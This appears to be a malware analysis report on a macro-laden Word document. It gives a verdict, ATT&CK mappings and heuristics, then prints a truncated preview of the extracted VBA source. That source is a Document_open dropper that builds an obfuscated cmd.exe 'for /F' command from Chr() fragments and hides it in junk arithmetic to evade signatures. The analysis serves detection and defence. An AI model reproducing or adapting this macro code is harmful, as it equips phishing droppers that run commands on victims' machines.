Verdict: MALICIOUS (risk score 222)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Word document (the module attributes name 1Normal.ThisDocument as its base) carrying VBA macros. A Document_open handler runs as soon as the document is opened; in the extracted source it calls Application.Run with a string assembled at run time from Chr() calls and short literals, and the heuristics additionally flag a Shell() call in the module. The literal fragments visible in that string ("d /", "fO^r", "/^F", "delims=", "tokens=", "%^F") are the pieces of a caret-obfuscated cmd.exe for /F command line, so the macro is a dropper stage that hands execution to the command interpreter rather than a self-contained payload. Almost all of the 53 KB module is arithmetic over variables that are never assigned; it exists only to bloat and randomize the code against static signatures, and the On Error Resume Next at the top of each routine swallows the run-time errors it raises. The ClamAV signature Doc.Dropper.Agent-6614044-0 agrees with the dropper assessment.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6614044-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware (Doc.Dropper.Agent-6614044-0).
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: the document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: the macro code calls Shell(), i.e. it can launch an external process.
- Document_Open macro [high, OLE_VBA_DOCOPEN]: a Document_Open handler is present; Word runs it automatically once macros are enabled, with no further user action.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: the compiled VBA (p-code) stream contains an auto-execution token together with shell/download/object-execution tokens. This check works on the compiled stream rather than the source text, so it still fires for p-code-only documents and for documents whose source cannot be extracted.
- Embedded URL [info, EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into normal drawing markup, and is benign on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53363 bytes | 65b49ba4d91bf241120d6f2e5135b54b466abaea735733894c24931f18d8a009 |

Script preview (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "wdNftDs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fbshZptjIfCiop()
BiHvM = 61628 - fQKCh * NWGsTi - vEtcbf * fvpfFU / KowwI / 62307 + bwGDD * PsbqO - fUzkfU * 64709 + nkbizN
XSJiJ = 86279 - HjoDOH * CfwIbV - zEipp * miJiMr / CNwLp / 73434 + kwlliZ * dXffN - JXOfp * 38161 + AZZJq
UmlbT = 48892 - EjsSI * wdRDZP - AcbQTd * uFobam / uJYPN / 98004 + kjYivu * zYucM - TsKVI * 81766 + OzsQrV
zQBoi = 34038 - AFsSVP * SSoqI - ANIoXc * wYpKkn / lCRKiM / 29682 + udYMZ * XLSErU - mHMRG * 70864 + cPhihT
UtoMQ = 52241 - vDlXi * vjtzN - EBwCG * BlloI / aVNifF / 32113 + oDwGjl * lTSzR - wVAVqi * 78176 + piHvz
mojmSp = 62611 - BSsKQ * IKiwz - MizTWW * oKYcuH / hpqsMX / 41132 + WvmiDc * OvKqhY - oNQwE * 84678 + cqwCc
End Function
Private Sub Document_open()
On Error Resume Next
jHKmoH = (kRGGa - nGwNSJ * 75578 * wHKtt - blwZCf - pbqvJ + 68391 * wcrLcw) + WZKwi / akzAtu * awVhE * hwfIRJ
twoRRu = (cfuNmM - TXTjn * 14047 * XNniU - Gtlwv - aJqzvQ + 99621 * lqFcwf) + FJUppK / VjBizq * iuwSCm * dXYQn
zHEMv = (zojYMA - hmzMND * 50359 * KwLGV - bXVzfm - mGQYpG + 6254 * SzlIl) + jHQLk / qnLsG * EYROZ * OGvfjo
kNfjAf = (VilPSW - bWsRjJ * 54674 * cujwS - wjbkQA - wzDdd + 22693 * KPzqz) + wYTasj / VlkzD * BYwJi * VGdZo
DROuMm = (MFrjh - NurmTw * 18654 * rpbQDr - XEbbN - nzfusE + 36427 * dKrQX) + rsTMJ / FMcndI * qpBPIT * avMrb
BkKsppA = Application.Run("iijVoSLk", "" + TQwRwME + bYojEbqCONMz + CVar("c") + HhParRtp + WQjBbwJVmkFfG + DatHjiZnI + EmXtHMkS + fuaTWwRhiB + dlzVImAOnc + CsfCDP + ETYvhRuD + CdHEAmq + vHstA + jVQvFWZAs + FOUUIZF + FJJOjQ + PiYXpSYu + qZnoI + OKIwLOHsF + BOlwzVKr + ablIASYpN + VZlEdt + YBkfRjJ + ViwfLbqiNK + RIbwam + XJJQCDc + kXiwDvn + TPASCaspE + kpuPBiAcN + PbUzYs + aFPNEdIEsY + qrwZzjVrPE + ZvwvXRPCiHEaEu)
dMojUj = (AiQiX - BDfzdN * 16744 * dbQYaV - iscop - lnYOW + 18706 * jwBQG) + BXwbO / jwzlY * tKSRp * qhOPQG
HNjZu = (siDvjW - jVUMk * 61802 * nGAmjE - MBlAFh - EsvUD + 76718 * KtLCP) + dMSUV / wPANzq * fjhSvd * DbdZsj
DXcno = (zvOSJq - jBJmmo * 20869 * jLWIus - nWVCEz - sbzGiw + 5889 * EIYUzG) + nRGUbT / GftwQ * szHml * JhmjGO
End Sub
Function zCiZzSV()
iHJNwM = (BJbGt - KFWXiG * 54871 * QrKzN - LzXYW - ClwjrO + 40512 * KPGvUJ) + bQVkNL / RPzQlK * EmDjv * ZIqjT
KhsnlR = (wqQjaB - DrvimO * 23618 * SYssk - CYNTwz - HjuRk + 86721 * bodwfY) + MINzj / KOTus * nuSDPi * rvKAR
vBlOcD = (kjBnJn - Thjac * 20673 * FcDLZk - SapQc - sQdlo + 65381 * SYkPaH) + FbJFq / RpZiCC * XSFMW * XWDDvl
skMdK = (EwzAwt - QozVO * 13167 * MYjVY - AHmaSw - YiIMcv + 75629 * SqZLL) + nskQrq / wTDqEN * wMZhBO * mjntTT
kRNVGX = (BzDdzs - INaYq * 73564 * rsHPl - UMZsYr - hYbUbr + 56619 * HjdEE) + WMYtih / sYFGU * RpaKEH * jklFz
End Function
Attribute VB_Name = "YdvwNMUpQAUP"
Function DatHjiZnI()
On Error Resume Next
mRAZjX = (94712 * 1988) - (WIVQJ / 20470 / 80375 * zWLKbd)
hjajb = (33868 * 92526) - (zhhcbj / 15135 / 59274 * SjQcq)
USCzH = PDHDul * DCqKB + TwBjoz - UCWjt / qivEt - bDzzX - 67654 - SsJQT + 20764 / zdJTiN + 3866 + VMjXKp * uIzwCa - TwdAQf - LlDYwH / UcVfG
BZCpdNo = CStr(Chr(KSXiIDdbGPCKNK + zBrWiXRBTYMC + 109 + BDIlLWvdcltPnQ + hGtNUHkwUnAV)) + "d " + "/" + CStr(Chr(qaGHNzBbwunW + cOjAHmq + 99 + GduSKRYW + suTIfCufG)) + " " + "fO^" + "r , " + "/^F ; " + ", " + CStr(Chr(awifVFDzNctkRz + hrJaYNHjKJ + 34 + wNGjzKj + noMUWLmw)) + " de" + "li" + CStr(Chr(IBjNowh + qCUMzzBA + 109 + mHTwHtCz + CVhBHzC)) + "s="
nhjcXL = (76785 * 3720) - (BrWUr / 9828 / 23424 * RbcMHQ)
uRwsPLw = "zWef " + "tok" + "ens= " + "+1 " + " " + CStr(Chr(RmQjToJ + MVULRoXupCb + 34 + zcYKVVTECznz + WXzJwaakjh)) + " ;" + " %" + "^F"
tYdhZ = (60672 * 32097) - (vWCrU / 58471 / 19593 * GbCVz)
Iwhir = (53208 * 31801) - (okMJbW / 88272 / 51872 * fQHpb)
MCBabRPlzlG = " ; ;" + " in " + ", , " + "( " + ", '" + " , " + "," + " F" + "TYP" +
```
... (truncated)